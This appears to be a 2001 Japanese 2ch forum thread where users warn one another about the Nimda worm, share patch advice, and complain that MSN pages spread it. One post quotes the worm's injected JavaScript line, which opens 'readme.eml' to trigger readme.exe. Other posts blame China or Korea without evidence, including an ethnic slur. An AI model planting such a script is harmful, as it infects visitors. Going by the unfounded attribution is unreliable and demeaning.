> 9.16 クラッカー注意報＠超未確認情報：９月１８日に中国側から大規模な攻撃があるかも？しれません。何となく騒がしいので念のため注意して下さい。（9.18 = 満州事変 70周年?）別件ですが こんなリスト が中国側に出回ってます。

■緊急セキュリティ情報■
WEBを見るだけで感染するウイルス（Windows向け）が
昨夜（９／１８）から自己増殖しております。
2chとしましては技術云々どうでも良いので
何がなんだかわからない人はインターネットエクスプローラーSP2に
バージョンをあげる事によって「見ただけで感染」は防げます。
各自WindowsUpdateを行ない、その後もWEBから
不信なプログラムをダウンロードしない事を強くお勧めいたします、

#ブラクラはリセットすりゃなおるが
#これはリンクされただけでフォーマットしないとだめだしのう。

>>819
けど　コリアンも引っかかってたな　流行の自爆かな

すまん(^_^;)なんかミスった

>>to マァヴ

早く張ろう　時間が勝負だねー。

てすと

うむ。　cgi error出てた(藁

>820

＞#これはリンクされただけでフォーマットしないとだめだしのう。

この１行が意味不明なんすけど。「リンクされただけで」？

張った(^_^;)

こんなもんで(^_^;)無難だけど

>>826
悪意を持ったリンクへ飛んだだけで　の間違いだ　すまん。

>>マァヴ
おつヵれです。

www.2ch.net/iyan.html
のほうが　アピールは強いかも。各方面へ　いろんな意味で。

>>マァヴさん

お疲れ様です。

昨日から俺のＰＣおもいきり調子悪い・・・というか今日修理にでも出そうかと思ってるんだけど
もしかしてこれのせい？？
症状はどんななの？？

多分、chocoサーバ（モ板系のみ）以外は全部更新したはず・・・
chocoは不正アクセスできない・・・・(^_^;)
気が向いたら確認なんかしてみて。

このスレのじゃないけど
例のヤツ、JavaScriptのかわいらしいアラートが出るだけで
別になんともならないよ｡
外観で言ってるんじゃなくて
なんともなってない。

>>834
シマンテックのウイルス情報ページへのリンクも張った方が
いいのではないですか？

>>マァヴ
mentai かわってなかったり。

IE6でも大丈夫？

>>836
とりあえずフラッシュってことで・・・・
これから第二報を書きますね(^_^;)

>>837
cgiが更新されてから、なんか書き込まれないと更新されないんです(^_^;)＞TOP

IE6だいじょぶ。

ＭＳＮがひらきません

ウイルスバスター最新定義入れたら
さっそくreadme.exeダウンロードで検出された。

今5.5ＳＰ2、ＤＬ中。

>>まぁヴ
とりあえずasahi.comよりは速かったかのう。

たぶん対応は市万テックが一番早いかなぁ。

とりあえずサーバーのログみると日本が多いんだよね
中国からのアタックと思って間違いなし。

おぉー、ウィルスバスターもやっと更新されたか・・・。

セキュリティ板の有志で解析始めてくれ。

readme.exeくれよ

てｓｔ

>>847

そこらへんのＷＥＢ行けばダウンロードが始まるよ。
過去のリンクミロ。

>>847

すぐ見つかるよ。

第二報エラーが出る(^_^;)とほほ

ウィルスはｲｲ??

>>851
何書こうとしたのーよ?
おれcgi屋だからなんかアドバイスできるかもーよ?

マァヴさんがいると言う事は、設定変更の前触れかな？

msn復活したね
ガイシュツ？

test

つーか、msn、
マイクロソフト自身がやってるニュースサイトなんだし、
自分も撒き散らしに加担したんだから
責任とってちゃんと速報だせよ・・・
9/19 09:03現在、それ関連の記事はなんもトップに載ってない。
自分のとこのサーバ直して終わりはねぇだろーよー

さすが2ch!!

だから止まってたのか。

msnはこのまま済ませようと思ってるのか？

>>857
まあマイクロソフトのすることですから

どうでもいいけど、俺のID、躁鬱だ。

http://tech.msn.com/ip/msnart100.asp

これは？

>>859
おいらもどうでもいいけど、idがMSだ。

このままシランプリか？>>MSN

いい根性しておる。

マイクロソフト セキュリティ サーベイ http://sec.mspj.co.jp/
９月２５日から苦情を受け付けるそうだ。

だめだ(^_^;)URLを埋めこめない・・・・
スキルなくてすまーん。

ＹＢＢ以上に事が悪質なんで永久に晒し者かな＞ＭＳＮ

>>868
正規表現ではりつけてみた？

toマァヴ

<A HREF=\"http://www.2ch.net/2ch.html\">

\をいれてみれ。

おれ1じゃないの。

スタートメニューにupdateが出なくて、
英語も読めない私みたいな人はどうすべきでしょう？
逝くべき？

http://daily.rotten.com/
に書いてあるんだけど、ワードの日本語版でもやったら出来たよ。
やり方はワードを立ち上げて
"NYC"って入れてその文字をドラッグ、書式(c)からフォント、
英数字用のフォント(F)をWingdingsに変えるだけ。

既出だったらスマソ。
フォント変えるだけで、「アイラブニューヨーク」と
「ユダヤ人を殺せ」に変わるってすごいね。マイクロソフト。

>>873
http://windowsupdate.microsoft.com/

>>873
ここに逝け。
http://www.microsoft.com/downloads/release.asp?ReleaseID=32082

やってみる。
またとまったらごめん(^_^;)

新型ウィルス、アメリカ政府が大規模捜査

http://www.nikkei.co.jp/news/kaigai/20010919CFNI019818.html

株式会社マウント富士インターネット
にウェブサイトを置いている、全てのユーザーがやられている！?
http://www.mfi.or.jp/www/individual.html

>>878

大規模とは書いてない

本当だ！
検索サイトでひっかかった所
行って見たら一発だ！
readme.exe出来てた。
俺の、５．５ｓｐ２なんだけど大丈夫かな？

今必死に日本語に訳しているところか。
http://msn.zdnet.com/zdfeeds/msncobrand/reviews/0%2C13828%2C2811488-hud00025ab%2C00.html

*.emlの関連づけを解除すればいいんじゃないの？

だめだ・・・・

<a href=\"http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]\"><B>シマンテック社による情報</B></a><
どうも、これでは気に入らないらしい・・・・(^_^;)
もしかして.を\.にするとかそういうんじゃないよね？

>>879
そうそう、トップで警告してるのにね。ヽ(´ー｀)ノ

>>884
わかった
@ だよたぶん　@も \@ と \でエスケープしてみて

＠マークの前にも￥を置かないと・・・・・

>>881
5.5 SP2なら自動実行はされないから、
実行してなければ大丈夫なはず。

>>885 トップに書いてあるのは、8月20日のJavaScriptの件だ…。
今回のは対応されていない。トップも盛大に感染しているし。

>>889
ttp://search.fresheye.com/?kw=readme.eml&term=monthly
こんな状況だもんね。（ｗ

すげぇ　この板ってセキュ板住民よりすげぇじゃねぇか？
セキュ板見てたらニュース板の奴らウイルスだって騒いでるよ
ウイルスじゃないのにツーようなかんじで書いてあったぞ。
セキュ板もう当てにしないよ

新型ウィルスNimdaかな？
winNTと2000はやばいらしい。
あと、98、95は大丈夫とのこと。
まったく文字のないメールとか妙なメールがきてない？
それがやばいらしいから、あやしいメールはすぐ削除してみて。。
でもすでに感染してるならおそいかも。。。
対処法はわからないけど、とりあえずNimdaで検索エンジンあたって
みることをおすすめします。
おだいじに。

サーバー管理者へのメッセージは要らない?

ど、どうよ？(^_^;)

これって、クラゲみたいに、変態する高度なウィルスだよな。
親体はＩＩＳサーバー同士で感染しあう。
アクセスしてきた、IE5.0に子供を感染させる。
子供も周りにどんどん拡がる…。

子供が親に戻る機能はあるんだろうか？

やったー！(^_^;)御教授感謝！

>894
ｲｲ！

http://www.cert.org/advisories/CA-2001-26.html

>>894
完璧っす。(^^

>>891
セキュ板見てないから文脈よく分からんけど、
ウイルスじゃなくてワームだって言いたいんじゃない？

オークネット
http://www2.e-auc.ne.jp/
凄いコメントだ…。
---------------------------------------------
当ページはSSLによる暗号化とべリサイン社によるサー
バ認証により高い安全性を確保し、安心してインターネッ
トをご利用いただけます。
---------------------------------------------

あぁ俺絶対感染してるよ
つかＩＩＳ鯖に飛ばされまくってんだけど
感染と関係あるのかなぁ？

ああ鬱だ
emlがいっぱいある・・・

>>901
感染先晒すときはリンク張らないようにしなよ・・・

■新種ウイルス「Ｎｉｍｄａ」の感染拡大＝米司法長官■

http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all

【シリコンバレー１８日時事】「Ｎｉｍｄａ（ニムダ）」と
呼ばれる危険度の高い新種のコンピューターウイルスが登場し、
ウイルス対策会社などが注意を呼び掛けている。
米国では同時テロが発生した直後だけに、インターネットを
利用したサイバーテロの活発化が懸念されていたが、
アシュクロフト司法長官は１８日、「現時点で（ウイルスと）
テロとの関連を示す証拠はない」としている。
米ウイルス対策大手シマンテックによると、同ウイルスは、
電子メールで届けられる添付ファイル「ｒｅａｄｍｅ．ｅｘｅ」
に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。
マイクロソフト製ウェブサーバーソフトを利用している他の
コンピューターに対して同ソフトのセキュリティーホール（欠陥）
を狙った攻撃を仕掛ける。　（時事通信）[9月19日9時3分更新]

つーか昨日の夜セキュいたで危険は少ないって行ってたから
行って落としちゃったんだよね。
糞

>>903 そうでした失礼。

つかＩＩＳ鯖に飛ばされまくってんだけど
感染と関係あるのかなぁ？

とりあえず一番拡散の恐れの高かった信用組合（金融機関）にはメールしておいた。
（ノートンを更新したら、感染ページを開くと自動的に警告窓が出て
Nimdaを弾くようになってた）

ニムダってなんか韓国語っぽいなあ。

>>905
実行してないなら問題ないでしょ。
ただ、IEのバージョンによっては自動実行されてしまうから危険なんで。

誰か新スレたてて下さい。
今度はインパクトのある【お題】で・・・

ＭＳＮのページが開けないってことは
IEのアップグレードすることもできないじゃん。
どうしたらいいの？

ＰＣ再起動できなくなるかもよ。怖い。

あっという間に伸びると思っていたんだけど
新スレまでかなり時間かかったね。

マイクロソフトは問題ないっしょ。

http://www.microsoft.com/japan/ie/

？？？

>>912
msn逝かなくても、
ここ直接いきゃいいっしょ。
http://windowsupdate.microsoft.com/

ｺｿｰﾘ
http://help.msn.co.jp/notice.htm

ｱﾘｶﾞﾄ

IE6なんだけど大丈夫?
あとネスケでの危険性も教えてﾌﾟﾘｰｽﾞ!!

まだ状況わからんですが、気をつけようage。

>>918
おっ！出たね。

>>920
IE6で試してみましたが、感染したページを開くと「実行しますか？」のウインドウが出てくるので、
そこでキャンセルすれば問題ないです。

>>917
今回はMSより2チャンのほうが　早いし正確だったな
だってIE5.00も感染が確認されたもの(藁

>>918
よく気付いたね・・・
今msn.co.jpのトップ見たけど、何処からリンク張られてる？
そのページへのリンク見当たらないんだけど。

ログみるとすごいね。みんな感染しまくりだよ。
なんか疫病に冒された患者が押し寄せてる感じだよ。

＞新種のワームによる被害をこうむりました。

おいおい、てめえのセキュリティホールだろうが！！！！！！

関係ないんだけど、昨日ﾈｯﾄｻﾌｨｰﾝ中に「ネットスケープ レジストリアップデート」とかいうのが勝手に起動した人いる？
ウイルス騒動が昨日なんでなんか怖い。

うちもルーターのログ見ると、有りもしないWebサーバー:80を見に来た
お客さんが大量に記録されてる。主にキムチの国から。

Last-Modified: Wed, 19 Sep 2001 00:43:41 GMT だって。

中央下の方にMSN トゥディってあるでしょ。そこにあるよ。
本当にｺｿｰﾘと。

さらに改良

IEのバージョンて、どうやったらわかるの？

>>923
どーもです

ヘルプ>>932

>>926
俺のところも見てみた(ちゃんとパッチ済みのIIS。Code Redにも感染せず)けど、
鬱になるくらい多いな・・

並立させてapacheなサーバもいるが、こっちも同程度。

>>９３２
IEのヘルプ見たらわかるYO

ちょっと変だった(^_^;)

>>930
ほんとだ。
ほんとにｺｿｰﾘ。
さも他人事のように。

http://news.2ch.net/test/read.cgi?bbs=news&key=1000861682

その2立てといたよ

俺が警告メール出してあげた会社、未だにそのままじゃん！
もう、10時過ぎてるぞ！早く気が付けって！

やっぱりそれはNimdaだ。
やばいWebの特徴は最後に妙なスクリプトがついてるらしい。
あと、メールでひろがるけど、README.EXE.がやばい
から削除してね。
ちなみに、Nimdaの正式名称はW32/Nimda.A-mm。
おだいじに。

今回のは、既発のパッチが完璧に当たった、IISサーバにも感染するの？

>>マァヴ ★ さんへ
お疲れさま〜。
今回は、どこを改良したのですか？？

どうやら話題のコンピューターウイルスに感染したみたいです。
セキが止まらず、体がダルく、熱が３８度あってフラフラなのですが
ノートンとかウイルスバスターとかを起動すれば直るのでしょうか？

>944
モニターに頭ぶつけましょう！
ひびが入るまで！

>>マァヴ ★ さんへ
すみません。　カチュからだったので気がつきませんでした。
さっきよりもイイ(^0^)/

>>944
お大事に氏ね

リナクサーだから関係ないや。
LINUXばんざい

>>943
WindowsUpdateへのリンクを張ったです。
>>917さんきゅ。

>>944
アゴでキーボードを連打してみて

>>942
次スレに返事を書いておく。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000861682

□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□
□■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□
□■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■
□□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□

ちなみにロビーではあの、みみずん ★のサーバがやられました(^_^;)
再インストール決定だって・・・・。

ネスケerは大丈夫か。

>>952 それじゃ、ニッダと読めるね。

>>955 正解キボンヌ! ほとんどハングルを知らないもので。
ユニコードで ？ ？
では間違い？ nim-daではダメなの？

>>956 ありゃ、bbs.cgiにつぶされた…。
＆＃45784; ＆＃45796;

1個ずつアップデートするのがだるいからサービスﾊﾟｯｸがほしい(Win98)
去年の10月から放置してる問題もあるし、OSも発売2年ほどで放置気味になってるね。
金とってこれは酷いぞ。

>>マァヴ ★ さんへ
みみずん★さんの応援に行くのかな？？
とりあえず、がんばって下さい！！

>>952 良く見たら「ノッダ」だよ

>>956

□
LI ←ニ T ←ム　[ト ←ダ

という感じですな。
（あんま関係無いけど、ハングル文字って勉強すると面白いよ）

>>960 ずれた・・・

□
Ｔ　←これが（ム）

Ｔって、"U"って発音じゃありませんでしたっけ。

Nim - da で２文字にするんですよね？

私は高校２年生の時に自分の性格を直したくて、
コンクリートの壁に頭を打ちつけながら「毎食茶碗１杯」の御飯で２年間押し通したんです。
ウソだと思ったら、お袋に聞いてみれば解ります。

　２０代の頃、デートをしてホテルで食事をした時に、私は「箸を下さい」と注文しました。
すると、
相手の女性が、「田中さん、恥ずかしいからヤメテ」---と言うのです。
私は、その場で立ちあがり黙って帰りました。
　　（「若気の至り」でした。）
２度と会いませんでした（腹の中で、「この馬鹿おんな」と思いました）。
　冗談じゃない！。
ナイフ・フォークはチンパンジーだって使えるんです。
箸の方が道具として総合的に優れており、歴史的にも長い歴史を持っています。

ラディンに違いない！

>>1　怪しさ全快　いまさらだけど笑った

1000

>>955
それで、正解はどうなのぉぉぉぉ!
教えて下さいまし。

いつかマックワールドでAPPLEもウイルス入りCD配ってたな。

MSNの鯖って日本だったっけ？？

1000ｹﾞｯﾄｰ!
￣￣￣￣￣∨￣￣￣　　　　　　　(´´
　　　　 ∧∧　　　）　　　　　　(´⌒(´
　　⊂（ﾟДﾟ;⊂⌒｀つ≡≡≡(´⌒;;;≡≡≡
　　　　　　 ￣￣　 (´⌒(´⌒;;
　　　　　　ｽﾞｻﾞｰｰｰｰｰｯ

1000取ったやつはうんこ

msn、オリコをはじめとする多数のwebが改竄、感染の踏み台にされる(2001.9.19)
https://www.netsecurity.ne.jp/article/9/2842.html

>>968
955で正しいですよ。
Ｌ＝n ｜＝i　口＝m　匚＝d(t) 卜＝a

>>960 ひょっとして知ったか？
正解を答えてみろyo!

んとさぁ
ttp://www.takara-univ.ac.jp/artist/tyoukoku/sakaguti/index.html
↑のindexの最終行に
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
って書いてあるんだけど、これがヤバイの？

1000

旧レスあげてスマソ。
宇津駄。

>>976
そゆこと。IE5.0だと、それをそのままダウンロードして、しかも
readme.emlの中にある、readme.exeを勝手に実行してしまう。
IE5.5SP2とかでも、ダウンロードしますか？って聞かれて、はいと答えると、
readme.exeを勝手に実行してしまう。

さらに、メールにreadme.exeが付いてくると、勝手に実行してしまう。

で実行されてしまうと、はい。おしまい。

1000!

おお･･対策しました

ＩＥ６／／べーたですが・・なにか？

1000

犯人は・・にむださん

かんこっくのかたでせうか？

1
0
0
0

1000

梅毒感染

さ・・いってみようかあ

1000

1000

」
お・・どうだあ

ぬわわわ

1000

神

いけ

１０００

Ｔプルーフ

１０００

hj

１０００Get

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。